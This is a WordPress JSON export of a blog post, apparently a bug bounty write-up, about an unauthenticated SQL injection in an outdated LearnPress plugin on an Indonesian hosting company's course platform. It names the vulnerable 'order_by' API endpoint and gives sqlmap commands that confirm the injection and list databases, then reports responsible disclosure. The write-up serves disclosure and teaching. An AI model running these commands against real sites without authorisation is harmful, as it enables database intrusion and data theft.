{"id":234,"date":"2024-11-20T08:19:00","date_gmt":"2024-11-20T01:19:00","guid":{"rendered":"https:\/\/n45ht.or.id\/blog\/?p=234"},"modified":"2025-10-14T10:07:57","modified_gmt":"2025-10-14T03:07:57","slug":"critical-sql-injection-in-a-major-indonesian-web-hosting-platform","status":"publish","type":"post","link":"https:\/\/n45ht.or.id\/blog\/critical-sql-injection-in-a-major-indonesian-web-hosting-platform\/","title":{"rendered":"Critical SQL Injection in a Major Indonesian Web Hosting Platform"},"content":{"rendered":"\n<p>While exploring vulnerabilities in a major web hosting company in Indonesia, I discovered a critical SQL injection vulnerability in their online course platform. Although I am unable to disclose the company name or specific platform, this writeup outlines the discovery process and demonstrates the impact of the vulnerability.<\/p>\n\n\n\n<p>I accessed the website and identified that it used <strong>WordPress<\/strong> with the <strong>LearnPress plugin<\/strong>. Upon further investigation, I found that their LearnPress plugin was outdated and vulnerable to SQL injection. According to Wordfence, the affected versions were detailed as:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Title:<\/strong> LearnPress &lt;= 4.2.5.7 &#8211; Unauthenticated SQL Injection via order_by<\/li>\n\n\n\n<li><strong>Reference:<\/strong> <a href=\"https:\/\/www.wordfence.com\/threat-intel\/vulnerabilities\/wordpress-plugins\/learnpress\/learnpress-4257-unauthenticated-sql-injection-via-order-by\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">https:\/\/www.wordfence.com\/threat-intel\/vulnerabilities\/wordpress-plugins\/learnpress\/learnpress-4257-unauthenticated-sql-injection-via-order-by<\/a><\/li>\n<\/ul>\n\n\n\n<p>The Wordfence post highlighted the <strong><code>order_by<\/code><\/strong> parameter as the vulnerable entry point. 
I examined the website and found an API endpoint that used this parameter:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>https:&#47;&#47;example.com\/wp-json\/lp\/v1\/courses\/archive-course?order_by=popular<\/code><\/pre>\n\n\n\n<p>This endpoint, used for fetching courses via AJAX, was a prime target for SQL injection testing.<\/p>\n\n\n\n<p>To verify the vulnerability, I utilized <strong>sqlmap<\/strong>, a powerful SQL injection testing tool. First, I ran a basic scan to confirm the injection point:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/sqlmap -u \"https:\/\/example.com\/wp-json\/lp\/v1\/courses\/archive-course?order_by=popular*\" --random-agent --level=3 --risk=3<\/code><\/pre>\n\n\n\n<p>The asterisk (<code>*<\/code>) appended to the value of the <code>order_by<\/code> parameter marks the injection point for sqlmap.<\/p>\n\n\n\n<p>The scan results confirmed that the parameter was vulnerable. Next, I listed the available databases to assess the extent of the compromise:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/sqlmap -u \"https:\/\/example.com\/wp-json\/lp\/v1\/courses\/archive-course?order_by=popular*\" --random-agent --level=3 --risk=3 --dbs<\/code><\/pre>\n\n\n\n<p><strong>Result:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"838\" height=\"394\" src=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/11\/n45ht-critical-sql-injection-in-a-major-indonesian-web-hosting-platform2.png\" alt=\"\" class=\"wp-image-287\" style=\"width:347px;height:auto\" srcset=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/11\/n45ht-critical-sql-injection-in-a-major-indonesian-web-hosting-platform2.png 838w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/11\/n45ht-critical-sql-injection-in-a-major-indonesian-web-hosting-platform2-300x141.png 300w, 
https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/11\/n45ht-critical-sql-injection-in-a-major-indonesian-web-hosting-platform2-768x361.png 768w\" sizes=\"auto, (max-width: 838px) 100vw, 838px\" \/><\/figure>\n\n\n\n<p>Upon confirming the vulnerability, I immediately reported it to the company. Recognizing the severity of the issue, they promptly acknowledged the report and rewarded me with <strong>3 months of free hosting<\/strong> as a token of appreciation for identifying and responsibly disclosing the critical SQL injection vulnerability.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Related Articles<\/h3>\n\n\n\n<p>If you&#8217;re interested in more bug bounty stories, check out my writeups on vulnerabilities in other Indonesian web hosting platforms:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/n45ht.or.id\/blog\/post-based-xss-on-domainesia\/\">POST-based XSS on DomaiNesia<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/n45ht.or.id\/blog\/reflected-dom-based-xss-on-domainesia\/\">Reflected DOM-based XSS on DomaiNesia<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/1337.or.id\/post\/1000-idor-755516dd0fcd\">$1.000 IDOR @ Indonesian Webhost<\/a><\/li>\n<\/ul>\n\n\n\n<p>Thank you for reading, and happy hacking!<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>While exploring vulnerabilities in a major web hosting company in Indonesia, I discovered a critical SQL injection vulnerability in their online course platform. Although I am unable to disclose the company name or specific platform, this writeup outlines the discovery process and demonstrates the impact of the vulnerability. 
I accessed the website and identified that [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":286,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[23,30],"class_list":["post-234","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-research","tag-bug-bounty","tag-sql-injection"],"_links":{"self":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/234","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/comments?post=234"}],"version-history":[{"count":5,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/234\/revisions"}],"predecessor-version":[{"id":289,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/234\/revisions\/289"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media\/286"}],"wp:attachment":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media?parent=234"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/categories?post=234"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/tags?post=234"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}